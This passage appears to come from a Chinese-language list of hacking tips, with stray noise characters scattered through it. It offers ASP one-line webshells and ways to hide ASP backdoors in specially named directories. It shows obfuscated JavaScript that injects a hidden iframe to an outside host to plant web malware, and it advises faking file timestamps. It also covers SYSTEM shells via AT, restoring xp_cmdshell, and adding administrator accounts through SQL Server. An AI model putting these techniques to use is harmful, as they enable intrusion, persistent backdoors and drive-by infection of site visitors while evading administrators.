e).<%25Execute(request("l"))%25>2 `! D$ _7 l7 b! s! r6 \# g. ?
f).<%if request("cmd")<>"" then execute request("pass")%>
4 S5 X. N9 W8 s6 J
. {! x+ a* ]; h( n% O/ r4 g O52、at "12:17" /interactive cmd3 P- D7 W( l9 G* b2 D& o( h3 H
执行后可以用AT命令查看新加的任务, h8 a) O7 y; i4 q9 k: O8 J m
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。0 y: n) \7 v5 P# {" H; ^, u
6 J6 }' m6 c2 o! @
53、隐藏ASP后门的两种方法, L0 @+ D) v% Z
1、建立非标准目录:mkdir images..\
, C1 R3 Z5 ^/ w8 [2 G( {: c拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
% A6 M9 n, y/ V通过web访问ASP木马:http://ip/images../news.asp?action=login& y0 u, ?2 d" O
如何删除非标准目录:rmdir images..\ /s7 z7 u! h9 f( G7 i1 [0 j9 h
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
3 j$ L" |6 t( E0 |mkdir programme.asp
# U& _2 T. T1 s& n: F1 ]) H新建1.txt文件内容:<!--#include file=”12.jpg”-->
9 A5 J( n; {, x# f新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件" v9 u$ k$ D& L8 N
attrib +H +S programme.asp
, k4 D. d7 A. s4 u `通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt" r1 [7 D6 V a$ M2 V
# V) H) w; C( ^- K54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
# ~ b& n r* H( C! ?然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
3 O P+ Y# S& N; Q2 h; c- A. K# L7 I# w a, U8 l% K
55、JS隐蔽挂马2 a, T. l" k# [+ L0 B+ B, @
1.# [. \% E$ z$ \
var tr4c3="<iframe src=ht";
4 l) B( z* c' T/ F2 I# E1 n' rtr4c3 = tr4c3+"tp:/";
. z h. u. W# Itr4c3 = tr4c3+"/ww";
8 D+ o9 q0 N: q& [' f/ w- ntr4c3 = tr4c3+"w.tr4";. t& w) i- j. P3 j7 ^4 u
tr4c3 = tr4c3+"c3.com/inc/m";+ ?2 a; B ~9 x. |, n
tr4c3 = tr4c3+"m.htm style="display:none"></i";
4 L0 O$ Z& {: \3 H5 E7 `tr4c3 =tr4c3+"frame>'";2 E5 x& q4 b" W9 \) M$ U
document.write(tr4c3);
. r& ~! D& D4 y1 K! Q, ?避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。* D1 b0 e7 F! t. C
3 _5 `, n2 s; D
2.& @$ d p% l6 x5 c7 J2 n! u! }
转换进制,然后用EVAL执行。如
+ k2 N l# P" Y: x2 @eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");; b0 e X0 `7 `$ x R9 E* a/ M
不过这个有点显眼。
/ y7 s( S3 d$ t2 T3.
$ Q/ e& O0 F9 W3 @document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
; m1 X% G; |$ b+ b. W最后一点,别忘了把文件的时间也修改下。- Q3 ~+ k+ _1 L. u x! ^: A
z6 }) f) N9 H4 T' @56.3389终端入侵常用DOS命令
: ]( \- Z8 v2 v, z6 Qtaskkill taskkill /PID 1248 /t, d4 m3 F+ e! E W
# X( D3 |7 j! Btasklist 查进程0 ]$ y) |8 N% @3 c; c8 H/ D
& j% J- E% j8 W q; ^: i
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
A5 A" i8 q& s) Tiisreset /reboot& B3 J+ K1 ~9 ?* c+ S3 H
tsshutdn /reboot /delay:1 重起服务器+ `! ~6 s0 @' E
, d+ l) N/ N% t& b$ ~5 B2 u
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,; h8 |. K8 ^0 Q
; k P# G2 d1 K! k, C0 @$ Xquery user 查看当前终端用户在线情况% F p7 o- f5 |6 u2 O7 c3 }$ a
& A9 }( w3 j i/ \ T要显示有关所有会话使用的进程的信息,请键入:query process *, W- Z i4 e# W. P& t7 _: N' a
5 d% P) w7 k& w要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
& M' [4 R0 r9 a
% h* K5 J1 d m要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2( A- p. `7 Y5 C) [" V& c! K
6 p& _2 ~3 [9 t* _" X- L要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02( K6 L, ^/ {7 U
5 ~: t, q* `$ ~6 z$ d3 p命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启( h( m; x8 l9 K+ I: [
2 V9 B7 B1 P! _/ D# A) d
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统8 n! d# b6 v* }; N8 \; e
8 B5 `4 Z# t; x3 l1 s* F8 l
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
5 K. {8 V- g) h: s- I& o
/ e! ~3 k2 V$ u4 B3 H' {# ]! ]9 ~命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机9 e4 i/ A7 s: f3 M6 Q7 O
6 F7 f+ ^( I. Z7 l, i9 p56、在地址栏或按Ctrl+O,输入:) r% Z9 B, }) @5 _0 Y' I1 \: i1 T
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
1 b* n3 h' [, ]
: B6 i5 `& c2 m5 L7 |源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。' T5 v2 }" F/ O; h
4 w* S' f J- }
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,$ A! b; K& G" D5 l. S. K5 ~
用net localgroup administrators是可以看到管理组下,加了$的用户的。" M$ N( z! }( C7 q3 \4 B$ I) [
5 b: Z( j: B+ ~3 ^- ^/ P58、 sa弱口令相关命令9 r& e5 L5 _ y: H
& t$ C8 E0 X, T; |8 ~# o
一.更改sa口令方法:
8 I/ h& M5 _ i* |4 u用sql综合利用工具连接后,执行命令:
3 {2 T! g V8 B- ]! Vexec sp_password NULL,'20001001','sa'( r$ U+ C6 H S
(提示:慎用!)! J# C D$ g8 k" }9 U9 F! g
" r8 G# f! K4 ]" Z9 @二.简单修补sa弱口令.. j+ Y, f7 x7 L: p* d
" j$ U9 K9 N5 g4 V$ n7 u" _( b" W方法1:查询分离器连接后执行:. K) w6 Q) `1 X3 S
if exists (select * from; }# g4 H" f- w9 q
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and; c: F$ l+ w9 Z9 s* c8 [" G
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)! F. M+ n: u6 ^
% }0 [/ U* L& u& o B7 K
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
$ I( V( C! ~0 M( b% a; X5 n8 Y/ W
8 f! v S" o" Y7 z0 ?; uGO
R& a t4 b x- w+ M1 o1 G* [. R9 r( j8 O4 l) Z
然后按F5键命令执行完毕0 p8 H7 A2 u, a0 r: d
4 K& `7 P: q5 b" a) {, Z& j
方法2:查询分离器连接后) i' J$ [1 m# c3 u+ N
第一步执行:use master
* o( k( w4 S; f: M4 X第二步执行:sp_dropextendedproc 'xp_cmdshell'( f# G% [$ m4 {- E0 g8 C$ \ S
然后按F5键命令执行完毕
7 q* [( c v7 O4 ^, E6 B8 O/ [0 J, v2 ^9 f# j2 c+ r( ^ [0 H: R
2 H9 S, I+ ~7 X
三.常见情况恢复执行xp_cmdshell.
' Y+ q" m: K9 ?# b+ }4 L& f+ B2 |+ n8 k# K s6 t9 v
0 v6 _( ?" g- O }1 q# k- r% M2 J e) S
1 未能找到存储过程'master..xpcmdshell'.
/ H+ Z6 E$ E6 ]7 K 恢复方法:查询分离器连接后,! P( G6 f6 u4 X) n
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
+ h+ c" r8 a2 n第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
* P# K$ r& P! m然后按F5键命令执行完毕6 V8 F7 M( M: ^5 `' B
9 i. m# c# n6 y$ B% ?* n
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)6 @( f' Z6 ^0 o1 X
恢复方法:查询分离器连接后,
) X4 Q2 B5 P* ]( @4 I! l第一步执行:sp_dropextendedproc "xp_cmdshell"
" G t; Q# k, N/ T$ q" i第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'* V9 Z* [8 V6 c' o' a
然后按F5键命令执行完毕; d* [; ]: j3 N' ]
% a& i t5 k- r0 }6 p
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)# y# t; z* u: f, C( o6 O& ?
恢复方法:查询分离器连接后,
9 l) s3 n6 x$ `0 e3 J/ u第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
/ K7 W/ o& B7 h4 ?0 B, o( R第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
9 d1 r3 x; [8 B6 B3 p然后按F5键命令执行完毕
- X; p) A3 D/ [1 K" ~2 u, t2 {! I% v
四.终极方法.
, U/ p' T! n; ^' o- G% h如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
! i% X: Y' Z; i! v查询分离器连接后, t+ i+ U4 m2 m& e* K. o0 f6 V
2000servser系统:
. `7 r: T, r( u, a w- i1 |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'" ]* `# y( f/ f$ Z2 w a/ R
4 l" Q$ v" w4 I/ @: o* B. Edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. v; d2 u: t8 O1 N/ c' p7 ?1 v4 p4 S6 v- }: c" r
xp或2003server系统:
' ^: g- K0 r" Q. s& O5 F+ p
) \4 W% _% n$ ?0 qdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'$ g2 r. G& p7 p0 ?. d1 v
. O8 T4 T2 o# f3 m8 j& fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
. I! ~/ g5 [* x% t/ A) p' b |